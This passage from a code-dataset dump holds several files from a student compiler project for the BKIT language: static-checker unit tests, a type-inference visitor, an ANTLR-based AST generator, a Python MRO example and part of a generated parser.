z[2][3][4] = {1.,2.};\n Var: w[2] = {3.,4.};\n Var: x;\n abc = z;\n foo(x);\n EndBody. \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"abc\"),[IntLiteral(1)])))\n self.assertTrue(TestChecker.test(input,expect,478))\n \n def test_479(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: abc[5];\n Function: foo\n Parameter: x[2]\n Body:\n x[1] = 1;\n abc[1] = 2;\n EndBody.\n Function: main\n Body:\n Var: z[2] = {1,2};\n Var: w[2] = {3.,4.};\n Var: x;\n abc[1] = 1;\n foo(z);\n foo(w);\n EndBody. 
\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[Id(\"w\")])))\n self.assertTrue(TestChecker.test(input,expect,479))\n \n def test_480(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: abc[5];\n Function: foo\n Parameter: x[2]\n Body:\n x[1] = 1;\n abc[1] = 2;\n EndBody.\n Function: main\n Body:\n Var: z[2] = {1,2};\n Var: w[2] = {3,4};\n Var: x;\n abc[1] = 1.5; \n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"abc\"),[IntLiteral(1)]),FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,480))\n \n def test_481(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x[2]\n Body:\n EndBody.\n Function: main\n Body:\n Var: z[2] = {1,2};\n Var: w[2] = {3,4};\n Var: x;\n foo(z);\n foo(w[2]);\n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[ArrayCell(Id(\"w\"),[IntLiteral(2)])])))\n self.assertTrue(TestChecker.test(input,expect,481))\n \n def test_482(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x\n Body:\n y= x + main(0.5);\n\n EndBody. 
\"\"\"\n expect = str(Undeclared(Identifier(),\"y\"))\n self.assertTrue(TestChecker.test(input,expect,482))\n \n def test_483(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main \n Body:\n If True Then\n Var: a;\n Var: x;\n Var: y;\n x = 1;\n y = 2;\n z = 3;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"z\"))\n self.assertTrue(TestChecker.test(input,expect,483))\n \n def test_484(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n Var:i;\n For (i = 6*9,True, i-1) Do\n Var:x=5;\n a=3;\n EndFor.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"a\"))\n self.assertTrue(TestChecker.test(input,expect,484))\n \n def test_485(self):\n \"\"\"Created automatically\"\"\"\n input = \"\"\"\n Function: main\n Body:\n Var: x[5];\n If True Then\n While True Do\n Return x;\n EndWhile.\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,485))\n \n def test_486(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n Var:x;\n While x>1 Do\n If x==1 Then Return;\n EndIf.\n EndWhile.\n Return True;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(BooleanLiteral(True))))\n self.assertTrue(TestChecker.test(input,expect,486))\n \n def test_487(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n Var:a;\n Do \n Var:b;\n Do\n While(b!=4)\n EndDo.\n While(a!=3) \n EndDo.\n a=1.0;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),FloatLiteral(1.0))))\n self.assertTrue(TestChecker.test(input,expect,487))\n \n def test_488(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x,y\n Body: \n Do \n Return main(x,y);\n While True\n EndDo.\n EndBody.\n \"\"\"\n expect = 
str(TypeCannotBeInferred(Return(CallExpr(Id(\"main\"),[Id(\"x\"),Id(\"y\")]))))\n self.assertTrue(TestChecker.test(input,expect,488))\n \n def test_489(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:a;\n Function: main \n Parameter: n\n Body: \n Do\n Return a+3;\n While True\n EndDo.\n Return a *. 10.e2;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"*.\",Id(\"a\"),FloatLiteral(1000.0))))\n self.assertTrue(TestChecker.test(input,expect,489))\n \n def test_490(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x,y\n Body: \n Return main(x +3,y +. 10.2);\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(CallExpr(Id(\"main\"),[BinaryOp(\"+\",Id(\"x\"),IntLiteral(3)),BinaryOp(\"+.\",Id(\"y\"),FloatLiteral(10.2))]))))\n self.assertTrue(TestChecker.test(input,expect,490))\n \n def test_491(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter:a\n Body: \n a=1;\n foo(a,3*7, a+ 5,\"string\",True);\n EndBody.\n Function: foo \n Parameter: a,b,c,d,e\n Body: \n Var:z;\n a=4;\n b=21;\n c=6;\n d=\"Hello\";\n z= !e;\n a = (b==c) && !d;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(UnaryOp(\"!\",Id(\"d\"))))\n self.assertTrue(TestChecker.test(input,expect,491))\n \n def test_492(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: a,b,c\n Body: \n a= (a==b)!= c +3;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"!=\",BinaryOp(\"==\",Id(\"a\"),Id(\"b\")),BinaryOp(\"+\",Id(\"c\"),IntLiteral(3)))))\n self.assertTrue(TestChecker.test(input,expect,492))\n \n def test_493(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n If n == 0 Then\n If n!=0 Then\n If n!=0 Then\n a=5;\n EndIf.\n EndIf.\n EndIf.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"a\"))\n self.assertTrue(TestChecker.test(input,expect,493))\n \n 
def test_494(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: x;\n Function: main \n Parameter: x[5]\n Body:\n x = {1.,2.,3.,4.,5.};\n EndBody.\n Function: foo\n Body:\n x = 2;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,494))\n\n def test_495(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function : print\n Parameter : x\n Body:\n Return;\n EndBody.\n\n Function: m\n Body:\n Var : value = 12345;\n Return value;\n EndBody.\n\n Function: main\n Parameter : x, y\n Body: \n print(m); \n Return 0;\n EndBody.\n \"\"\"\n expect = str(Redeclared(Function(),\"print\"))\n self.assertTrue(TestChecker.test(input,expect,495))\n\n def test_496(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \n Parameter: x[5]\n Body:\n Var: y[5]; \n x = {1,2,3,4,5};\n main(y);\n foo(1.2);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 2;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),IntLiteral(2))))\n self.assertTrue(TestChecker.test(input,expect,496))\n\n def test_497(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \n Parameter: x[5]\n Body:\n Var: y[5]; \n x = {1,2,3,4,5};\n main(y); \n y = {1.,2.,3.,4.,5.};\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),ArrayLiteral([FloatLiteral(1.0),FloatLiteral(2.0),FloatLiteral(3.0),FloatLiteral(4.0),FloatLiteral(5.0)]))))\n self.assertTrue(TestChecker.test(input,expect,497))\n\n def test_498(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \n Parameter: x[5]\n Body:\n Var: y = 1; \n x = {1,2,3,4,5};\n main(y); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[Id(\"y\")])))\n self.assertTrue(TestChecker.test(input,expect,498))\n\n def test_499(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \nBody:\n Var: a=1,x; \n a=foo(x); \nEndBody. 
\n \"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,499))\n\n def test_500(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main\n Parameter: x\n Body:\n If True Then\n Var: x = 1;\n main(1.5);\n EndIf.\n main(2);\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[IntLiteral(2)])))\n self.assertTrue(TestChecker.test(input,expect,500))\n def test_case_90(self):\n input = \"\"\"\n Var: x, a[10], b[5];\n Function: main\n Parameter: x\n Body:\n Do\n printStrLn(b[2]);\n While f()[2] EndDo.\n EndBody.\n Function: f\n Body:\n b[1] = \"dasd\";\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Dowhile(([],[CallStmt(Id('printStrLn'),[ArrayCell(Id('b'),[IntLiteral(2)])])]),ArrayCell(CallExpr(Id('f'),[]),[IntLiteral(2)]))))\n self.assertTrue(TestChecker.test(input, expect, 489))" }, { "alpha_fraction": 0.4632001519203186, "alphanum_fraction": 0.46836167573928833, "avg_line_length": 35.52447509765625, "blob_id": "fb8e932d1e08b6d6b5828ea013129032cd79c416", "content_id": "0ef9794996b3dfe7c181e9cc25f4cd7bff68cb66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5231, "license_type": "no_license", "max_line_length": 91, "num_lines": 143, "path": "/type/Q3_1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\n\nclass StaticCheck(Visitor):\n def visitProgram(self,ctx:Program,o:object):\n o = {}\n env = reduce(lambda x, y: dict(y.accept(self, x).items() | x.items()), ctx.decl, o)\n stmts = reduce(lambda x, y: y.accept(self, x), ctx.stmts, env)\n\n def visitVarDecl(self,ctx:VarDecl,o:object):\n return {ctx.name: None}\n \n def visitAssign(self,ctx:Assign,o):\n rhs_type = ctx.rhs.accept(self, o)\n lhs_type = ctx.lhs.accept(self, o)\n \n if None == rhs_type:\n raise TypeCannotBeInferred(ctx)\n \n if None != rhs_type and None == lhs_type:\n o[ctx.lhs.name] = 
rhs_type\n lhs_type = rhs_type\n \n if rhs_type != lhs_type:\n raise TypeMismatchInStatement(ctx)\n \n return o\n \n def visitId(self, ctx, o):\n if ctx.name not in o:\n raise UndeclaredIdentifier(ctx.name)\n return o[ctx.name]\n \n def visitBinOp(self,ctx:BinOp,o):\n type1 = ctx.e1.accept(self, o)\n type2 = ctx.e2.accept(self, o)\n join_type = set([type1, type2])\n \n if (ctx.op == '+' or ctx.op == '-' or ctx.op == '*' or ctx.op == '/'):\n if 'float' in join_type or 'bool' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'int'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'int'})\n return ctx.accept(self, o)\n return 'int'\n \n elif (ctx.op == '+.' or ctx.op == '-.' or ctx.op == '*.' or ctx.op == '/.'):\n if 'int' in join_type or 'bool' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'float'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'float'})\n return ctx.accept(self, o)\n return 'float'\n \n elif (ctx.op == '>' or ctx.op == '='):\n if 'float' in join_type or 'bool' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'int'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'int'})\n return ctx.accept(self, o)\n return 'bool'\n \n elif (ctx.op == '>.' 
or ctx.op == '=.'):\n if 'bool' in join_type or 'int' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'float'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'float'})\n return ctx.accept(self, o)\n return 'bool'\n \n elif (ctx.op == '&&' or ctx.op == '||' or ctx.op == '>b' or ctx.op == '=b'):\n if 'float' in join_type or 'int' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'bool'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'bool'})\n return ctx.accept(self, o)\n return 'bool'\n\n def visitUnOp(self,ctx:UnOp,o):\n join_type = ctx.e.accept(self, o)\n \n if (ctx.op == '!'):\n if 'float' == join_type or 'int' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'bool'})\n return ctx.accept(self, o)\n return 'bool'\n \n elif (ctx.op == '-'):\n if 'float' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'int'})\n return ctx.accept(self, o)\n return 'int'\n \n elif (ctx.op == '-.'):\n if 'int' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'float'})\n return ctx.accept(self, o)\n return 'float'\n \n elif (ctx.op == 'i2f'):\n if 'float' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'int'})\n return ctx.accept(self, o)\n return 'float'\n \n elif (ctx.op == 'floor'):\n if 'int' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'float'})\n return ctx.accept(self, o)\n return 'int'\n\n def visitIntLit(self,ctx:IntLit,o):\n return 'int'\n\n def visitFloatLit(self,ctx,o):\n return 'float'\n\n def visitBoolLit(self,ctx,o):\n return 'bool'\n " }, { "alpha_fraction": 
0.6341699957847595, "alphanum_fraction": 0.6414381265640259, "avg_line_length": 41.048980712890625, "blob_id": "d14dadb90e8a0678ac57a60a857c7242e2ad6ab8", "content_id": "bc4ec58d99301278df995f61bf8215194857896b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10319, "license_type": "no_license", "max_line_length": 128, "num_lines": 245, "path": "/Assignments/assignment2/src1.0/main/bkit/astgen/ASTGeneration.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\nfrom functools import reduce\n\nclass ASTGeneration(BKITVisitor):\n\n def visitProgram(self,ctx:BKITParser.ProgramContext):\n var_decls = list(reduce(lambda y,x: y + self.visitVar_declare(x), [item for item in ctx.var_declare()], []))\n funcs_decls = list(reduce(lambda y,x: y + self.visitFunction_declare(x), [item for item in ctx.function_declare()], []))\n return Program(var_decls + funcs_decls)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n funcName = Id(ctx.ID().getText())\n params = self.visitParams_list(ctx.params_list())\n declare = list(reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), []))\n stmt = list(reduce(lambda y, x: y + self.visitStmt(x), ctx.stmt(), []))\n return [FuncDecl(funcName, params, tuple((declare,stmt)))]\n\n\n # Visit a parse tree produced by BKITParser#primitive_data.\n def visitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n if ctx.INT_LIT():\n return IntLiteral(int(ctx.INT_LIT().getText()))\n if ctx.FLOAT_LIT():\n return FloatLiteral(float(ctx.FLOAT_LIT().getText()))\n if ctx.STRING_LIT():\n return StringLiteral(str(ctx.STRING_LIT().getText()))\n if ctx.BOOL_LIT():\n return BooleanLiteral(bool(ctx.BOOL_LIT().getText()))\n\n\n # Visit a parse tree produced by 
BKITParser#array_lit.\n def visitArray_lit(self, ctx:BKITParser.Array_litContext):\n if ctx.primitive_data():\n return ArrayLiteral(list(map(lambda datum: self.visitPrimitive_data(datum), ctx.primitive_data())))\n else:\n return ArrayLiteral(list(map(lambda datum: self.visitArray_lit(datum), ctx.array_lit())))\n\n\n # Visit a parse tree produced by BKITParser#var_list.\n def visitVar_list(self, ctx:BKITParser.Var_listContext):\n var_non_init = list(map(lambda decl: self.visitVar_non_init(decl), ctx.var_non_init()))\n var_init = list(map(lambda decl: self.visitVar_init(decl), ctx.var_init()))\n return var_non_init + var_init\n\n # Visit a parse tree produced by BKITParser#var_non_init.\n def visitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n if ctx.getChildCount() == 1:\n decl = VarDecl(Id(ctx.ID().getText()), [], None)\n if isinstance(decl, VarDecl):\n return decl\n else:\n dim = map(lambda x: int(x), [lit.getText() for lit in ctx.INT_LIT()])\n decl = VarDecl(Id(ctx.ID().getText()), dim, None)\n if isinstance(decl, VarDecl):\n return decl\n\n\n # Visit a parse tree produced by BKITParser#var_init.\n def visitVar_init(self, ctx:BKITParser.Var_initContext):\n if ctx.LEFT_BRACKET():\n dim = map(lambda x: int(x), [lit.getText() for lit in ctx.INT_LIT()])\n decl = VarDecl(Id(ctx.ID().getText()), dim, self.visitArray_lit(ctx.array_lit()))\n if isinstance(decl, VarDecl):\n return decl\n else:\n decl = VarDecl(Id(ctx.ID().getText()), [], self.visitPrimitive_data(ctx.primitive_data()))\n if isinstance(decl, VarDecl):\n return decl\n\n\n # Visit a parse tree produced by BKITParser#params_list.\n def visitParams_list(self, ctx:BKITParser.Params_listContext):\n params_list = [self.visitVar_non_init(x) for x in ctx.var_non_init()]\n return params_list\n\n\n # Visit a parse tree produced by BKITParser#stmt_list.\n def visitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n declare = reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), [])\n 
stmt = reduce(lambda y, x: y + self.visitStmt(x), ctx.stmt(), [])\n return list(declare), list(stmt)\n\n\n # Visit a parse tree produced by BKITParser#if_stmt.\n def visitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n if_then_stmt = []\n else_stmt = []\n num_of_expr = len(ctx.expr())\n for idx in range(num_of_expr):\n expr = self.visitExpr(ctx.expr(idx))\n if ctx.stmt_list(idx):\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(idx))\n else:\n var_decls, stmt_list = [], []\n if_then_stmt += [tuple((expr, var_decls, stmt_list))]\n else_stmt = tuple(())\n if ctx.ELSE():\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(num_of_expr))\n else_stmt = tuple(var_decls, stmt_list)\n return [If(if_then_stmt, else_stmt)]\n\n\n # Visit a parse tree produced by BKITParser#for_stmt.\n def visitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n iter_var = ctx.ID().getText()\n expr1 = self.visitExpr(ctx.expr(0))\n expr2 = self.visitExpr(ctx.expr(1))\n expr3 = self.visitExpr(ctx.expr(2))\n loop = tuple(self.visitStmt_list(ctx.stmt_list()))\n return [For(iter_var, expr1, expr2, expr3, loop)]\n\n # Visit a parse tree produced by BKITParser#while_stmt.\n def visitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = self.visitStmt_list(tuple(ctx.stmt_list()))\n return [While(expr, sl)]\n\n\n # Visit a parse tree produced by BKITParser#dowhile_stmt.\n def visitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = self.visitStmt_list(tuple(ctx.stmt_list()))\n return [DoWhile(sl, expr)]\n\n # Visit a parse tree produced by BKITParser#composite_var.\n def visitComposite_var(self, ctx:BKITParser.Composite_varContext):\n return ArrayCell(Id(ctx.ID().getText()), self.visitExpr(ctx.expr()))\n\n\n # Visit a parse tree produced by BKITParser#assign_stmt\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n lhs = Id(ctx.ID().getText()) if ctx.ID() else 
self.visitComposite_var(ctx.composite_var())\n rhs = self.visitExpr(ctx.expr())\n return [AssignStmt(lhs, rhs)]\n\n\n # Visit a parse tree produced by BKITParser#break_stmt.\n def visitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n return [Break()]\n\n\n # Visit a parse tree produced by BKITParser#continue_stmt.\n def visitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n return [Continue()]\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n return self.visitFunction_call(ctx)\n\n\n # Visit a parse tree produced by BKITParser#return_stmt.\n def visitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n return Return(self.visitExpr(ctx.expr()))\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n if ctx.REL_OP():\n return BinaryOp(ctx.REL_OP().getText(), self.visitExpr1(ctx.expr1(0)), self.visitExpr1(ctx.expr1(1)))\n return self.visitExpr1(ctx.expr1(0))\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n if ctx.BIN_LOGICAL_OP():\n return BinaryOp(ctx.BIN_LOGICAL_OP().getText(), self.visitExpr1(ctx.expr1()), self.visitExpr2(ctx.expr2()))\n return self.visitExpr2(ctx.expr2())\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n if ctx.ADD_OP():\n return BinaryOp(ctx.ADD_OP().getText(), self.visitExpr2(ctx.expr2()), self.visitExpr3(ctx.expr3()))\n return self.visitExpr3(ctx.expr3())\n\n\n # Visit a parse tree produced by BKITParser#expr3.\n def visitExpr3(self, ctx:BKITParser.Expr3Context):\n if ctx.MUL_OP():\n return BinaryOp(ctx.MUL_OP().getText(), self.visitExpr3(ctx.expr3()), self.visitExpr4(ctx.expr4()))\n return self.visitExpr4(ctx.expr4())\n\n\n # Visit a parse tree produced by BKITParser#expr4.\n def visitExpr4(self, ctx:BKITParser.Expr4Context):\n if ctx.UN_LOGICAL_OP():\n return 
UnaryOp(ctx.UN_LOGICAL_OP().getText(), self.visitExpr4(ctx.expr4()))\n return self.visitExpr5(ctx.expr5())\n\n\n # Visit a parse tree produced by BKITParser#expr5.\n def visitExpr5(self, ctx:BKITParser.Expr5Context):\n if ctx.UN_OP():\n return UnaryOp(ctx.UN_OP().getText(), self.visitExpr5(ctx.expr5()))\n return self.visitExpr6(ctx.expr6())\n\n\n # Visit a parse tree produced by BKITParser#expr6.\n def visitExpr6(self, ctx:BKITParser.Expr6Context):\n if ctx.index_op():\n return BinaryOp(str('[]'), self.visitExpr7(ctx.expr7(), self.visitIndex_op(ctx.index_op())))\n return self.visitExpr7(ctx.expr7())\n\n\n # Visit a parse tree produced by BKITParser#expr7.\n def visitExpr7(self, ctx:BKITParser.Expr7Context):\n if ctx.function_call():\n return self.visitCall_stmt(ctx.function_call())\n return self.visitExpr8(ctx.expr8())\n\n # Visit a parse tree produced by BKITParser#expr8.\n def visitExpr8(self, ctx:BKITParser.Expr8Context):\n if ctx.operand():\n return self.visitOperand(ctx.operand())\n if ctx.LEFT_PAREN:\n return self.visitExpr(ctx.expr())\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n if ctx.var_non_init():\n return self.visitVar_non_init(ctx.var_non_init())\n if ctx.primitive_data():\n return self.visitPrimitive_data(ctx.primitive_data())\n if ctx.array_lit():\n return self.visitArray_lit(ctx.array_lit())\n\n\n\n # Visit a parse tree produced by BKITParser#function_call.\n def visitFunction_call(self, ctx:BKITParser.Function_callContext):\n if ctx.expr():\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return CallStmt(ctx.ID(), expr_list)\n\n\n # Visit a parse tree produced by BKITParser#index_op.\n def visitIndex_op(self, ctx:BKITParser.Index_opContext):\n if ctx.index_op():\n return UnaryOp('[]', self.visitIndex_op(ctx.index_op()))\n else:\n return UnaryOp('[]', self.visitExpr(ctx.expr()))\n \n " }, { "alpha_fraction": 0.519336998462677, "alphanum_fraction": 
0.519336998462677, "avg_line_length": 12.961538314819336, "blob_id": "8baca60f9e4c1a8fe52e6dab4bb85cc94545081d", "content_id": "f59b49efb45c8f7899361e077ec41c8960128934", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 86, "num_lines": 26, "path": "/OOP/Question1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class O: \n pass\n\nclass A(O): \n def foo(self): \n print('in A')\n\nclass C(O):\n def foo(self):\n print('in C')\n\nclass B(O):\n pass\n\nclass D(B, A):\n pass\n\nclass E(C, A):\n pass\n\nclass F(E, D, B):\n pass\n\nif __name__ == '__main__':\n print(F.mro())\n F().foo() # invoked C because C appears before A in class resolutions of mro algo" }, { "alpha_fraction": 0.4729119539260864, "alphanum_fraction": 0.5103461146354675, "avg_line_length": 29.69942283630371, "blob_id": "d41d0fc4944f92386331f4836f1c881e7b09edcc", "content_id": "ea20ec571de0a26d1609885af9df2af4ddacf33b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5316, "license_type": "no_license", "max_line_length": 103, "num_lines": 173, "path": "/SyntaxAnalysis/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3D\")\n buf.write(\"\\7\\4\\2\\t\\2\\3\\2\\3\\2\\3\\2\\2\\2\\3\\2\\2\\2\\2\\5\\2\\4\\3\\2\\2\\2\\4\\5\")\n buf.write(\"\\3\\2\\2\\2\\5\\3\\3\\2\\2\\2\\2\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = 
ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \n \"'Else'\", \"'ElSelf'\", \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \n \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \n \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \n \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \n \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \n \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\" ]\n\n symbolicNames = [ \"<INVALID>\", \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", 
